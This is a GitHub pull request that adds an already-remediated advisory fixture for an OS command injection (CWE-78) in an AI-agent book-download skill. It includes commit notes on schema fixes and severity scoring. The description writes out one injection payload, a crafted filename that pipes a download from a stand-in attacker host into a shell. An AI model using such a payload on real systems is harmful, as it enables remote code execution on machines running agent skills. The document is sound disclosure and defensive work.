Skip to content

Add finding: OS command injection in an AI-agent skill (zlibrary-to-notebooklm, CWE-78)#122

Open
Amr-Saad wants to merge 3 commits into
Agent-Field:mainfrom
Amr-Saad:finding/zlibrary-to-notebooklm-command-injection
Open

Add finding: OS command injection in an AI-agent skill (zlibrary-to-notebooklm, CWE-78)#122
Amr-Saad wants to merge 3 commits into
Agent-Field:mainfrom
Amr-Saad:finding/zlibrary-to-notebooklm-command-injection

Conversation

@Amr-Saad

@Amr-Saad Amr-Saad commented Jun 7, 2026

Copy link
Copy Markdown

What

A community-contributed, real-world finding in SEC-AF's verdict → trace → evidence format, added under exampl/:

  • exampl/zlibrary-to-notebooklm-command-injection.finding.json — structured finding (SEC-AF finding schema: cwe_id, evidence_level, proof.data_flow_evidence.steps, compliance, remediation…)
  • exampl/zlibrary-to-notebooklm-command-injection.md — readable advisory

Why it fits SEC-AF

It demonstrates exactly the class SEC-AF is built to prove: an OS command injection (CWE-78) in an AI-agent skill. The vulnerable project is an MIT-licensed agent "skill" (zlibrary-to-notebooklm) that auto-downloads a book from Z-Library and shells out to the NotebookLM CLI.

Confirmed data flow: download.suggested_filename (attacker-controllable — the book uploader sets it) → download_pathtitle/file_path → f-strings → subprocess.run(..., shell=True) at 7 sinks (1 in convert_to_txt, 6 in upload_to_notebooklm). A book named '; curl https://evil.example/x.sh | sh; '.epub yields RCE when the skill processes it. The wrapping single-quotes are not a defence.

Responsible disclosure

The finding is already remediated — all seven sinks refactored to list-argv with shell=False, preserving behaviour (verified py_compile + zero shell=True). It is contributed as an example/fixture with the fix included, not a live 0-day.

Verdict

confirmed · severity high · evidence level 5 · CWE-78 · OWASP A03:2021.

…otebooklm)

A community-contributed, real-world finding in SEC-AF's verdict/trace/evidence
format, demonstrating the OS command-injection class (CWE-78) in AI-agent skills.

The vulnerable project is an MIT-licensed agent "skill" that auto-downloads a book
from Z-Library and shells out to the NotebookLM CLI. `download.suggested_filename`
(attacker-controllable) flows into f-strings run with subprocess.run(..., shell=True)
at 7 sinks -> RCE via a crafted book filename. Already remediated (list-argv,
shell=False); included as an example/fixture, not a live 0-day.

Files:
- exampl/zlibrary-to-notebooklm-command-injection.finding.json  (SEC-AF finding schema)
- exampl/zlibrary-to-notebooklm-command-injection.md            (readable advisory)
@CLAassistant

Copy link
Copy Markdown

CLA assistant check
Thank you for your submission! We really appreciate it. Like many open source projects, we ask that you sign our Contributor License Agreement before we can accept your contribution.
You have signed the CLA already but the status is still pending? Let us recheck it.

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: 361dda2943

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

Comment thread exampl/zlibrary-to-notebooklm-command-injection.finding.json
…ifiedFinding

The fixture is advertised as a SEC-AF finding, so consumers must be able to
load it with sec_af.schemas.prove.VerifiedFinding. It previously omitted
required fields and carried non-schema-shaped nested objects, so
VerifiedFinding.model_validate(...) would reject it:

- top-level: add required rationale, sarif_rule_id, sarif_security_severity
  (+ tags)
- proof: add required exploit_hypothesis, verification_method, evidence_level;
  fold the non-schema exploit_scenario into exploit_hypothesis and map the
  payload/outcome onto Proof.exploit_payload / Proof.expected_outcome;
  data_flow_evidence already matched DataFlowEvidence
- remediation: reshape to RemediationSuggestion (fix_description, patch_diff,
  confidence) from the prior non-schema summary/before/after/status/notes
- compliance/location were already schema-valid

Add tests/test_example_findings.py: parametrized over exampl/*.finding.json,
asserts each loads via VerifiedFinding.model_validate and that proof/
remediation, when present, are fully-formed. Guards every example finding,
current and future, against schema drift. Validated locally (pydantic 2.12.5;
2 passed).

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: c3c2041228

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

Comment thread exampl/zlibrary-to-notebooklm-command-injection.finding.json Outdated
…engine

The committed example understated the same finding the platform would emit.
SEC-AF's own scoring (sec_af.scoring) floors CWE-78 to critical and recomputes
exploitability_score = severity x evidence x reachability x chain, mirroring
the result into sarif_security_severity (orchestrator.py:383-385).

For this confirmed, level-5 RCE whose taint source is a remote attacker-
controlled filename, the engine produces: critical (10.0) x EXPLOIT_SCENARIO_
VALIDATED (0.9) x externally_reachable (1.0) x no-chain (1.0) = 9.0.

- severity: high -> critical
- exploitability_score: 3.0 -> 9.0
- sarif_security_severity: 8.8 -> 9.0 (mirrors exploitability_score)
- tags: + externally_reachable (the honest reachability bucket - taint enters
  from a remote, unauthenticated source; without it the engine's non-empty-tag
  fallback would score 4.5, still understating a confirmed RCE)
- rationale + companion .md updated to match

Strengthen tests/test_example_findings.py with
test_example_finding_agrees_with_platform_scoring: re-runs the engine's
floor + score pass over every fixture and asserts the stored values equal the
recomputation, so an example can never again silently disagree with the
platform. Verified locally: 3 passed (engine recomputes severity=critical,
score=9.0).

Co-Authored-By: Claude Opus 4.8 <noreply@anthropic.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants